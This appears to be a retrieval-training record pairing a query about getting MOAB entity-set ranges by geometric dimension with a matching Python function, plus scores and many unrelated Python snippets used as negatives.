assert pkg[\"inputs\"][2][\"type\"] == \"string?\"\n assert pkg[\"inputs\"][3][\"id\"] == \"optional_literal_explicit\"\n assert pkg[\"inputs\"][3][\"type\"][0] == \"null\"\n assert pkg[\"inputs\"][3][\"type\"][1] == \"string\"\n assert pkg[\"inputs\"][4][\"id\"] == \"required_array_shortcut\"\n assert pkg[\"inputs\"][4][\"type\"] == \"string[]\"\n assert pkg[\"inputs\"][5][\"id\"] == \"required_array_explicit\"\n assert pkg[\"inputs\"][5][\"type\"][\"type\"] == \"array\"\n assert pkg[\"inputs\"][5][\"type\"][\"items\"] == \"string\"\n assert pkg[\"inputs\"][6][\"id\"] == \"optional_array_shortcut\"\n assert pkg[\"inputs\"][6][\"type\"] == \"string[]?\"\n assert pkg[\"inputs\"][7][\"id\"] == \"optional_array_explicit\"\n assert pkg[\"inputs\"][7][\"type\"][0] == \"null\"\n assert pkg[\"inputs\"][7][\"type\"][1][\"type\"] == \"array\"\n assert pkg[\"inputs\"][7][\"type\"][1][\"items\"] == \"string\"\n # FIXME:\n # Although WPS minOccurs/maxOccurs' specifications are applied, they are not back-ported to CWL package\n # definition in order to preserve the same logic. CWL types should be overridden by complementary details.\n # - https://github.com/crim-ca/weaver/issues/17\n # - https://github.com/crim-ca/weaver/issues/50\n assert pkg[\"inputs\"][8][\"id\"] == \"required_literal_min_fixed_by_wps\"\n # assert pkg[\"inputs\"][8][\"type\"] == \"string\"\n assert pkg[\"inputs\"][9][\"id\"] == \"optional_literal_min_fixed_by_wps\"\n # assert pkg[\"inputs\"][9][\"type\"] == \"string?\"\n assert pkg[\"inputs\"][10][\"id\"] == \"required_array_min_fixed_by_wps\"\n # assert pkg[\"inputs\"][10][\"type\"] == \"string[]\"\n assert pkg[\"inputs\"][11][\"id\"] == \"required_array_min_optional_fixed_by_wps\"\n # assert pkg[\"inputs\"][11][\"type\"] == \"string[]?\"\n assert pkg[\"inputs\"][12][\"id\"] == \"required_array_max_fixed_by_wps\"\n # assert pkg[\"inputs\"][12][\"type\"] == \"string[]\"\n assert pkg[\"inputs\"][13][\"id\"] == \"optional_array_max_fixed_by_wps\"\n # assert pkg[\"inputs\"][13][\"type\"] == \"string[]?\"", "def entity(entity):\n for start, end in entity.spans:\n yield start, end-start", "def process_range(id_range):\n try:\n store = {}\n for i, id in enumerate(id_range):\n store[id] = loadProt(id)\n print(f'\\r>>Loading Set: {\"{:.2f}\".format(i+1 / len(id_range) * 100)}%', end='')\n return store\n except:\n traceback.print_exc()\n raise", "def __json__(self, request=None):\n # start = self.start.isoformat() if self.start else None\n # end = self.end.isoformat() if self.end else None\n return dict(\n timeref_type=\"daterange\",\n interval=self.interval,\n start=self.start.isoformat(),\n end=self.end.isoformat(),\n )", "def calculate_statistics(self) -> Dict[str, Tuple[str, float]]:\n tempDict = {\n 'max_start': ('', -1),\n 'max_end': ('', -1),\n 'max_time_low_availability': ('', -1),\n 'max_time_low_unoccupied': ('', -1)\n }\n\n\n\n return {\n 'max_start': ('', -1),\n 'max_end': ('', -1),\n 'max_time_low_availability': ('', -1),\n 'max_time_low_unoccupied': ('', -1)\n }", "def get_binding_motifs(seq):\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted", "def find_mode_range(self):\n\n if (len(self.models) < 1): return -1,-1,-1,-1\n nmin_total,nmax_total,lmin_total,lmax_total = self.models[0].find_mode_range()\n for model in self.models:\n nmin, nmax, lmin, lmax = model.find_mode_range()\n if (nmin < nmin_total): nmin_total = nmin\n if (nmax > nmax_total): nmax_total = nmax\n if (lmin < lmin_total): lmin_total = lmin\n if (lmax > lmax_total): lmax_total = lmax\n return nmin_total, nmax_total, lmin_total, lmax_total", "def evaluate_mapped_inputs(self,**kwargs):\n result = {}\n for v,t,o,p,n in zip(self.values,self.thresholds,self.operations,self.proportions,self.output_names):\n value = kwargs.get(v)\n if isinstance(t,basestring):\n threshold = kwargs.get(t)\n else:\n threshold = t\n if o == \"lt\":\n result[n] = (value < threshold * p)\n elif o == \"gt\":\n result[n] = (value > threshold * p)\n elif o == \"lte\":\n result[n] = (value <= threshold * p)\n elif o == \"gte\":\n result[n] = (value >= threshold * p)\n return result", "def type_with_ranges(self, tchain, p_elem, rangekw, gen_data):\n ranges = self.get_ranges(tchain, rangekw)\n if not ranges: return p_elem.subnode(gen_data())\n if len(ranges) > 1:\n p_elem = SchemaNode.choice(p_elem)\n p_elem.occur = 2\n for r in ranges:\n d_elem = gen_data()\n for p in self.range_params(r, rangekw):\n d_elem.subnode(p)\n p_elem.subnode(d_elem)", "def get_available_age_brackets_and_mapping():\n brackets_dic = {}\n dict_of_age_by_brackets = {}\n\n for num_agebrackets in [85, 18, 15, 12]:\n brackets = []\n if num_agebrackets == 85:\n for i in range(84):\n brackets.append([i])\n brackets.append(np.arange(84, 101))\n # # num_agebracket = 20 only works if you have an age distribution and\n # # matrices that go in more detail than age 84+, so if you wanted\n # # brackets of 85-89, 90-94, 95-100+, etc. it would be hard unless\n # # you have those matrices (which we don't because of the European\n # # matrices)\n\n # if num_agebrackets == 20:\n # for i in range(19):\n # brackets.append(np.arange(5 * i, 5 * (i + 1)))\n # brackets.append(np.arange(95, 101))\n if num_agebrackets == 18:\n for i in range(16):\n brackets.append(np.arange(5 * i, 5 * (i + 1)))\n brackets.append(np.arange(80, 84))\n brackets.append(np.arange(84, 101))\n if num_agebrackets == 15:\n for i in range(14):\n brackets.append(np.arange(5 * i, 5 * (i + 1)))\n brackets.append(np.arange(70, 101))\n if num_agebrackets == 12:\n for i in range(11):\n brackets.append(np.arange(5 * i, 5 * (i + 1)))\n brackets.append(np.arange(55, 101))\n\n age_by_brackets_dic = dict.fromkeys(np.arange(101), 0)\n for n, b in enumerate(brackets):\n for a in b:\n age_by_brackets_dic[a] = n\n\n brackets_dic[num_agebrackets] = brackets\n dict_of_age_by_brackets[num_agebrackets] = age_by_brackets_dic\n\n return brackets_dic, dict_of_age_by_brackets" ]
[ "0.65154475", "0.600458", "0.5998008", "0.5853334", "0.5807972", "0.5797119", "0.562755", "0.562755", "0.55852807", "0.55669194", "0.5557111", "0.5455386", "0.54513985", "0.5441645", "0.53997433", "0.53997433", "0.5393903", "0.5376995", "0.5375735", "0.53752905", "0.5361025", "0.53542024", "0.53466415", "0.53338194", "0.5326077", "0.53103244", "0.53081155", "0.5306106", "0.5288727", "0.5277856", "0.52645034", "0.52536285", "0.52473694", "0.52369153", "0.52260303", "0.5218554", "0.52129227", "0.51920414", "0.5176977", "0.5166336", "0.5160458", "0.5160458", "0.5160458", "0.5160458", "0.51533514", "0.51525843", "0.5135463", "0.5121645", "0.51174283", "0.5111095", "0.5105106", "0.51005304", "0.5089592", "0.50828683", "0.5082784", "0.5079511", "0.50665575", "0.5060187", "0.50567484", "0.5050537", "0.50223804", "0.50223804", "0.50223804", "0.50223804", "0.5008652", "0.49992755", "0.49914816", "0.49892315", "0.49740088", "0.49507877", "0.4941573", "0.49400443", "0.4936197", "0.4936197", "0.49124435", "0.49112305", "0.49096194", "0.4904893", "0.4903623", "0.48999575", "0.48963922", "0.48957574", "0.48903635", "0.48861217", "0.48852253", "0.48837274", "0.48823866", "0.48791784", "0.48684126", "0.48665616", "0.48614326", "0.48597464", "0.4859302", "0.48540697", "0.48534033", "0.48406684", "0.48403108", "0.48360687", "0.4835407", "0.4831873" ]
0.6155824
1
Get a dictionary with MOAB Ranges that are specific to the types.MBENTITYSET type inputs
def get_entityset_ranges(my_core, meshset, geom_dim): entityset_ranges = {} entityset_types = ['Nodes', 'Curves', 'Surfaces', 'Volumes'] for dimension, set_type in enumerate(entityset_types): entityset_ranges[set_type] = my_core.get_entities_by_type_and_tag(meshset, types.MBENTITYSET, geom_dim, [dimension]) return entityset_ranges
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getRangeMM(self) -> float:\n ...", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def get_native_ranges(my_core, meshset, entity_types):\n\n native_ranges = {}\n for entity_type in entity_types:\n native_ranges[entity_type] = my_core.get_entities_by_type(\n meshset, entity_type)\n return native_ranges", "def getMassRange(brand):\n return mass_range[brand]", "def test_get_meta_range(self):\n pass", "def range_(self):\n return self.bset.range_", "def get_param_ranges(line_model):\n\n line_models = ['voigt', 'rosato', 'stehle', 'stehle_param', ]\n n_upper_range = [(np.nan, np.nan), (3, 7), (3, 30), (3, 9)]\n e_dens_range = [(np.nan, np.nan), (1e19, 1e22), (1e16, 1e25), (0., 1e22)]\n temp_range = [(np.nan, np.nan), (0.32, 32), (0.22, 110), (0., 1000)]\n b_field_range = [(np.nan, np.nan), (0, 5), (0, 5), (0, 5)]\n\n param_ranges = list(zip(line_models, n_upper_range, e_dens_range, temp_range, b_field_range))\n columns = ['line_model_name', 'n_upper_range', 'e_dens_range', 'temp_range', 'b_field_range']\n param_ranges = pd.DataFrame(data=param_ranges, columns=columns)\n\n n_upper_range = param_ranges['n_upper_range'][param_ranges['line_model_name'] == line_model].values[0]\n e_dens_range = param_ranges['e_dens_range'][param_ranges['line_model_name'] == line_model].values[0]\n temp_range = param_ranges['temp_range'][param_ranges['line_model_name'] == line_model].values[0]\n b_field_range = param_ranges['b_field_range'][param_ranges['line_model_name'] == line_model].values[0]\n\n return n_upper_range, e_dens_range, temp_range, b_field_range", "def range_params(self, ran, kw):\n specs = {\"range\": (SchemaNode(\"value\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minInclusive\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxInclusive\")),\n \"length\": (SchemaNode(\"param\").set_attr(\"name\",\"length\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minLength\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxLength\"))}\n (exact, min_, max_) = specs[kw]\n if (len(ran) == 1 or ran[0] == ran[1]) and ran[0][0] != \"m\":\n elem = exact\n elem.text = ran[0]\n return [elem]\n res = []\n if ran[0][0] != \"m\":\n elem = min_\n elem.text = ran[0]\n res.append(elem)\n if ran[1][0] != \"m\":\n elem = max_\n elem.text = ran[1]\n res.append(elem)\n return res", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def get_range_info(self):\n with open(self.range_path, 'r') as _file:\n for line in _file.readlines():\n list0 = line.strip().split('-')\n range_dict = {\n 'min': int(list0[0], 16),\n 'max': int(list0[1], 16),\n 'max_offset': int(list0[1], 16) - int(list0[0], 16),\n }\n self.ranges.append(range_dict)", "def _parse_requantization_ranges(self):\n res = {}\n\n print_suffix = \"__print__\"\n lines = self._get_valid_log()\n temp_min = {}\n temp_max = {}\n pattern_def = r\"{};{}:\\[\\-?\\d+\\.?\\d*e?-?\\+?\\d*\\]\".format(print_suffix, self.postfix)\n for i in lines:\n if not re.search(pattern_def, i):\n continue\n\n max_line_data = i.split(print_suffix + \";\" + self.postfix)[-1]\n min_value = max_line_data.split('][')[0].split('[')[1]\n max_value = max_line_data.split('][')[1].split(']')[0]\n name = i.split(';')[1].strip()[:-len(print_suffix)]\n if name not in temp_min:\n temp_min[name] = []\n if name not in temp_max:\n temp_max[name] = []\n\n temp_min[name].append(float(min_value))\n temp_max[name].append(float(max_value))\n\n for key in temp_min:\n target_min_index = int(np.ceil(len(temp_min[key]) * (1 - self.threshold)))\n\n if key not in res:\n res[key] = []\n\n if target_min_index > len(temp_min[key]) - 1:\n target_min_index = len(temp_min[key]) - 1\n res[key].append(sorted(temp_min[key])[target_min_index])\n\n for key in temp_max:\n target_max_index = int(np.floor(len(temp_max[key]) * self.threshold)) - 1\n\n if target_max_index > len(temp_max[key]) - 1:\n target_max_index = len(temp_max[key]) - 1\n\n res[key].append(sorted(temp_max[key])[target_max_index])\n\n if self.tensor_data:\n for k, v in self.tensor_data.items():\n if k in res:\n self.logger.debug(\"Update node {} min to {}, max to {}.\".format(k, v[2], v[3]))\n res[k] = [v[2], v[3]]\n return res", "def get_range(self):\n classes = concrete_descendents(self.class_)\n d=dict([(name,class_) for name,class_ in classes.items()])\n if self.allow_None:\n d['None']=None\n return d", "def _part_group_cell_mapper(bd_type):\n js, iss = np.meshgrid(range(smt.cols), range(smt.rows)) # zero indexed to agree with python interpretation\n idx = bd_type.flatten() != -1\n out = dict(zip(range(1, idx.sum() + 1), list(zip(iss.flatten()[idx], js.flatten()[idx]))))\n return out", "def get_range(self):\n # CEBHACKALERT: was written assuming it would only operate on\n # Parameterized instances. Think this is an sf.net bug/feature\n # request. Temporary fix: don't use obj.name if unavailable.\n try:\n d=dict([(obj.name,obj) for obj in self.objects])\n except AttributeError:\n d=dict([(obj,obj) for obj in self.objects])\n return d", "def get_ranges(graph: Graph, property_to_id: Dict[str, int], entity_type_to_id: Dict[str, int]) -> Dict[int, int]:\n # dictionary pointing from object property id to an entity type id\n ranges = {}\n\n # add all range triples for which the subject is an object property and the object is an entity type\n for subject, predicate, object in graph.triples((None, RDFS.range, None)):\n if subject in property_to_id and object in entity_type_to_id:\n ranges[property_to_id[subject]] = entity_type_to_id[object]\n return ranges", "def get_limits(age_groups):\n\n limits = {}\n for data in age_groups:\n pattern = re.compile(r'([\\d]+)-([\\d]+)')\n match = pattern.search(data)\n age_min = int(match.group(1).strip())\n age_max = int(match.group(2).strip())\n # print(f'limits = {age_min} to {age_max}')\n limits[f'Age_{data}'] = [age_min, age_max]\n return limits", "def get_allowed_ranges(csvfile):\n from csv import DictReader\n ranges = {}\n with open(csvfile, 'r') as infile:\n # Remove spaces from field headers\n firstline = infile.readline()\n headers = [k.strip() for k in firstline.split(',')]\n if not len(headers) == 11:\n headers = [k.strip() for k in firstline.split(' ')]\n opfield = 'CSVv2;OperatingPoint'\n if not opfield in headers: opfield = 'cMVAv2;OperatingPoint'\n if not opfield in headers: opfield = 'CSV;OperatingPoint'\n\n reader = DictReader(infile, fieldnames=headers)\n for row in reader:\n key = (int(row[opfield].strip()),\n row['measurementType'].strip(),\n row['sysType'].strip(),\n int(row['jetFlavor'].strip()))\n ranges.setdefault(key, {})\n for var in ['eta', 'pt', 'discr']:\n mini = float(row['%sMin'%var].strip())\n maxi = float(row['%sMax'%var].strip())\n ranges[key]['%sMin'%var] = min(ranges[key].setdefault('%sMin'%var, mini), mini)\n ranges[key]['%sMax'%var] = max(ranges[key].setdefault('%sMax'%var, maxi), maxi)\n return ranges", "def map_range( self, rng ):\n rmap = {\n '2 nA': pac.Ammeter.CurrentRange.N2,\n '20 nA': pac.Ammeter.CurrentRange.N20,\n '200 nA': pac.Ammeter.CurrentRange.N200,\n '2 uA': pac.Ammeter.CurrentRange.U2,\n '20 uA': pac.Ammeter.CurrentRange.U20,\n '200 uA': pac.Ammeter.CurrentRange.U200,\n '2 mA': pac.Ammeter.CurrentRange.M2,\n '20 mA': pac.Ammeter.CurrentRange.M20\n }\n \n if rng in rmap:\n return rmap[ rng ]\n \n else:\n raise ValueError( 'Invalid range' )", "def setup_bins(self):\n width = int((self.max - self.min) / self.bin_size)\n bins = {\n i * width + self.min: (idx, idx + self.bin_size)\n for i, idx in enumerate(range(0, len(self.nums), self.bin_size))\n }\n return bins", "def ranges(self):\n return self._ranges", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def mass_combinations(mH_min, mH_max, mH_step_size, mB_min, mB_max, mB_step_size):\n\n higgsino_masses = np.arange(mH_min, mH_max, mH_step_size)\n bino_masses = np.arange(mB_min, mB_max, mB_step_size)\n\n tuples = list(it.product(higgsino_masses, bino_masses))\n namedtuples = [MassCombination(*_tuple) for _tuple in tuples]\n return filter(lambda x: x.mH > x.mB + 126., namedtuples)", "def getSets():", "def range_table(self):\n range_table_base = []\n if self.block_mask != None:\n range_table_length = len(self.block_mask)\n else:\n range_table_length = self.block_num\n\n for i in range(range_table_length):\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.k_size))\n range_table_base.append(len(self.pool_type))\n\n return range_table_base", "def getRange(self, chr, start, end, bins=2000, zoomlvl=-1, metric=\"AVG\", respType=\"DataFrame\"):\n try:\n iter = self.file.fetch(chr, start, end)\n # result = []\n # for x in iter:\n # returnBin = (x.reference_name, x.reference_start, x.reference_end, x.query_alignment_sequence, x.query_sequence)\n # result.append(returnBin)\n\n # if self.columns is None:\n # self.columns = [\"chr\", \"start\", \"end\", \"query_alignment_sequence\", \"query_sequence\"]\n\n # if respType is \"DataFrame\":\n # result = toDataFrame(result, self.columns)\n\n (result, _) = get_range_helper(self.toDF, self.get_bin,\n self.get_col_names, chr, start, end, iter, self.columns, respType)\n\n return result, None\n except ValueError as e:\n raise Exception(\"didn't find chromId with the given name\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def _autobounds(self):\n bounds = {}\n\n def check(prop, compare, extreme, val):\n opp = min if compare is max else max\n bounds.setdefault(prop, val)\n bounds[prop] = opp(compare(bounds[prop], val), extreme)\n\n def bound_check(lat_lon):\n lat, lon = lat_lon\n check('max_lat', max, 90, lat)\n check('min_lat', min, -90, lat)\n check('max_lon', max, 180, lon)\n check('min_lon', min, -180, lon)\n\n lat_lons = [lat_lon for feature in self._features.values() for\n lat_lon in feature.lat_lons]\n if not lat_lons:\n lat_lons.append(self._default_lat_lon)\n for lat_lon in lat_lons:\n bound_check(lat_lon)\n\n return bounds", "def create_dict(list, old_min, old_max, new_min, new_max):\n d = {}\n for row in list:\n tds = row.find_all(\"td\")\n letter = tds[0].string\n freq = tds[1].string[:-1]\n freq = float(freq.replace(',', '.'))\n d[letter] = map_to_range(freq, old_min, old_max, new_min, new_max)\n\n return d", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def scan_range(self, obj):\n detect_minmax = []\n for item in self._category:\n cat = item.replace(' ', '')\n has_minmax = False\n for k, v in obj.items():\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(v.items())[-1]\n while not isinstance(in_v, str):\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(in_v.items())[-1]\n \n if has_minmax:\n detect_minmax.append('Min ' + item)\n detect_minmax.append('Max ' + item)\n else:\n detect_minmax.append(item)\n \n self._category_aux = detect_minmax\n for c in self._category_aux:\n self._data[c] = []", "def kwargs (self):\n return dict (bins=self.bins, range=self.range)", "def kwargs (self):\n return dict (bins=self.bins, range=self.range)", "def get_gnid_range_map(node_tids):\n ntypes_gid_range = {}\n offset = 0\n for k, v in node_tids.items():\n ntypes_gid_range[k] = [offset + int(v[0][0]), offset + int(v[-1][1])]\n offset += int(v[-1][1])\n\n return ntypes_gid_range", "def create_band_maps(self):\n band_maps = []\n source_band_index = 1\n target_band_index = self.starting_target_band\n for band in self.image['bands']:\n band_maps.append({\n 'source': source_band_index,\n 'target': target_band_index\n })\n source_band_index += 1\n target_band_index += 1\n return band_maps", "def get_bounds():\n return [0.00], [1.00]", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def findRanges(data_grouped):\n ranges = []\n for i in data_grouped.columns:\n theRange = (data_grouped[i].min(), data_grouped[i].max())\n ranges.append(theRange)\n return ranges", "def get_valid_values_map(self, condition=True):\n tpninfos = self.locate.get_all_tpninfos(self.instrument, self.filekind, \"ld_tpn\")\n required_keys = self.get_required_parkeys()\n valid_values = {}\n for info in tpninfos:\n if info.is_complex_constraint:\n continue\n if info.name in required_keys:\n values = info.values\n if len(values) == 1 and \":\" in values[0]:\n limits = values[0].split(\":\")\n try:\n limits = [int(float(x)) for x in limits]\n except Exception:\n pass\n # sys.exc_clear()\n else:\n values = list(range(limits[0], limits[1]+1))\n if condition:\n values = tuple([utils.condition_value(val) for val in values])\n valid_values[info.name] = values\n return valid_values", "def test_get_range(self):\n pass", "def compute_bounds(self, space):\n bounds = np.zeros((len(space), 2))\n\n for idx, param in enumerate(space):\n\n if TYPE[param[\"type\"]] is TYPE.FLOAT or \\\n TYPE[param[\"type\"]] is TYPE.INTEGER:\n bounds[idx] = (param[\"min\"], param[\"max\"])\n\n elif TYPE[param[\"type\"]] is TYPE.DISCRETE or \\\n TYPE[param[\"type\"]] is TYPE.DISCRETE:\n bounds[idx] = (0, len(param['values']))\n\n return bounds", "def _get_area_incmfd_attr(max_np, max_hd, max_bins):\n\n att = []\n att.append({'name': 'src_id', 'type': 'String', 'len': 10})\n att.append({'name': 'src_name', 'type': 'String', 'len': 30})\n att.append({'name': 'tect_reg', 'type': 'String', 'len': 30})\n att.append({'name': 'upp_seismo', 'type': 'Real'})\n att.append({'name': 'low_seismo', 'type': 'Real'})\n att.append({'name': 'mag_scal_r', 'type': 'String', 'len': 15})\n att.append({'name': 'rup_asp_ra', 'type': 'Real'})\n att.append({'name': 'mfd_type', 'type': 'String', 'len': 20})\n\n att.append({'name': 'min_mag', 'type': 'Real'})\n att.append({'name': 'bin_width', 'type': 'Real'})\n att.append({'name': 'num_bins', 'type': 'Integer'})\n for i in range(1, max_bins+1):\n lab = 'or_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_npd', 'type': 'Integer'})\n for i in range(1, max_np+1):\n lab = 'weight_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'strike_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'rake_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'dip_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_hdd', 'type': 'Integer'})\n for i in range(1, max_hd+1):\n lab = 'hdd_d_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'hdd_w_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n return att", "def get_idranges(names, counts, num_chunks=None):\n gnid_start = 0\n gnid_end = gnid_start\n tid_dict = {}\n gid_dict = {}\n\n for idx, typename in enumerate(names):\n gnid_end += counts[typename]\n tid_dict[typename] = [[0, counts[typename]]]\n gid_dict[typename] = np.array([gnid_start, gnid_end]).reshape([1, 2])\n gnid_start = gnid_end\n\n return tid_dict, gid_dict", "def get_ranges(self, tchain, kw):\n (lo, hi) = (\"min\", \"max\")\n ran = None\n for t in tchain:\n rstmt = t.search_one(kw)\n if rstmt is None: continue\n ran = [ i.split(\"..\") for i in rstmt.arg.split(\"|\") ]\n if ran[0][0] != 'min': lo = ran[0][0]\n if ran[-1][-1] != 'max': hi = ran[-1][-1]\n if ran is None: return None\n if len(ran) == 1:\n return [(lo, hi)]\n else:\n return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)]", "def attributes(self):\n attrs_ = super(NumericAttributeSchema, self).attributes()\n attrs_.append(\"range\")\n return attrs_", "def _calc_range(self) -> np.ndarray:\n if self._is_ct25k():\n range_resolution = 30\n n_gates = 256\n else:\n n_gates = int(self.metadata[\"number_of_gates\"])\n range_resolution = int(self.metadata[\"range_resolution\"])\n return np.arange(n_gates) * range_resolution + range_resolution / 2", "def getAFeRange(brand):\n return afe_range[brand]", "def get_etype_2_minmax_funcEnum(entitytype_arr):\n etype_2_minmax_funcEnum = {}\n s = pd.Series(entitytype_arr)\n for name, group in s.groupby(s):\n etype_2_minmax_funcEnum[name] = (min(group.index), max(group.index))\n return etype_2_minmax_funcEnum", "def _parse_memory_map(cls, node: OMNode) -> List[OMMemoryRegion]:\n mmap = []\n for memregion in node.get('memoryRegions', []):\n for addrset in memregion.get('addressSets', []):\n name = memregion['name'].lower()\n mem = OMMemoryRegion(name,\n HexInt(addrset['base']),\n HexInt(addrset['mask']+1),\n memregion.get('description', ''))\n mmap.append(mem)\n return mmap", "def generate_var_ranges(self):\n\n var_ranges = {}\n for var in self.variables:\n min_to_max = list(range(int(var['min']), int(var['max']) + 1))\n if (var['zero_ok'] == False and 0 in min_to_max):\n min_to_max.remove(0)\n\n var_ranges[var['variable']] = min_to_max\n\n return var_ranges", "def byrange(self, start, stop):\n\t\treturn ElementsByRange(self.AEM_want, self, (start, stop))", "def prep_reference(self):\n\n # if basin\n if self.config.metric == 'basin':\n df = pd.read_csv(self.config.gcam_basin_names_file, usecols=['basin_id'])\n m = sorted(df['basin_id'].tolist())\n\n # if AEZ, use 1 through 18 - this will not change\n elif self.config.metric == 'aez':\n m = list(range(1, 19, 1))\n\n # read in region ids\n rdf = pd.read_csv(self.config.gcam_region_names_file, usecols=['gcam_region_id'])\n r = sorted(rdf['gcam_region_id'].tolist())\n\n return m, r", "def get_price_range_map(data_map):\n res_map = defaultdict(lambda: deepcopy(static_constants.UNIT_PRICE_DEFAULT))\n for key, list_of_price in data_map.items():\n list_of_price.sort()\n lower_price = np.percentile(list_of_price, 40)\n higher_price = np.percentile(list_of_price, 70)\n median_price = np.percentile(list_of_price, 50)\n res_map[key] = {'lower_price': lower_price, 'median_price': median_price, 'higher_price': higher_price}\n return res_map", "def range_to_m(self, data):\n return data * self._total_range + self._min_range_m", "def base_mappings():\n return {\n 'from_1': {\n 'to_1': {\n 'mol_1': ({}, {}, []),\n 'mol_2': ({}, {}, []),\n },\n },\n }", "def range_parameter_to_dict(parameter: RangeParameter) -> Dict[str, Any]:\n return {\n \"__type\": parameter.__class__.__name__,\n \"name\": parameter.name,\n \"parameter_type\": parameter.parameter_type,\n \"lower\": parameter.lower,\n \"upper\": parameter.upper,\n \"log_scale\": parameter.log_scale,\n \"logit_scale\": parameter.logit_scale,\n \"digits\": parameter.digits,\n \"is_fidelity\": parameter.is_fidelity,\n \"target_value\": parameter.target_value,\n }", "def setMassRanges(self, massRanges):\n\t\tif self.hasMassRange:\n\t\t\traise RuntimeError(\"Cannot setMassRange(...) twice, since the COMA has to be cut\")\n\t\tself.massRanges = self.toIntegerSectorMap(massRanges)\n#\t\tzeroIndices = []\n#\t#\tCMwrite(\"setMassRanges(\"+str(massRanges)+')')\n\t#\tfor s in range(self.nSect):\n\t#\t\tfor i,b in enumerate(range(self.borders[s],self.borders[s+1])):\n\t#\t\t\tif s in self.massRanges:\n\t#\t\t\t\tbinCenterMass = self.binCenters[b]\n\t#\t\t\t\tif binCenterMass < self.massRanges[s][0] or binCenterMass >= self.massRanges[s][1]:\n\t#\t\t\t\t\tzeroIndices.append(b)\n\t#\tfor i in range(len(self.coma)):\n\t#\t\tfor zi in zeroIndices:\n\t#\t\t\tself.coma[i,2*zi ] = 0.\n\t#\t\t\tself.coma[i,2*zi+1] = 0.\n\t#\t\t\tself.coma[2*zi ,i] = 0.\n\t#\t\t\tself.coma[2*zi+1,i] = 0.\n\n\t\tself.hasMassRange = True\n\t\tself.makeComaInv()\n\t\tself.specialCOMAs = {}", "def _bi_range(start, end):\n if start == end:\n return (start,)\n\n elif end < start:\n return reversed(range(end, start + 1))\n\n else:\n return range(start, end + 1)", "def summarize_ranges(self, ranges):\n if len(ranges) == 0: return []\n min_ = 'min'\n max_ = 'max'\n for r in ranges:\n if r[0][0] == \"min\":\n r[0][0] = min_\n else:\n min_ = r[0][0]\n if r[-1][1] == \"max\":\n r[-1][1] = max_\n else:\n max_ = r[-1][1]\n return ranges[-1]", "def process_range(id_range):\n try:\n store = {}\n for i, id in enumerate(id_range):\n store[id] = loadProt(id)\n print(f'\\r>>Loading Set: {\"{:.2f}\".format(i+1 / len(id_range) * 100)}%', end='')\n return store\n except:\n traceback.print_exc()\n raise", "def get_bounds():\n bounds = [\n (0.1, 0.5), # Omega_m\n (0.05, 0.15) # beta\n ]\n return np.array(bounds)", "def get_bases():\n\treturn 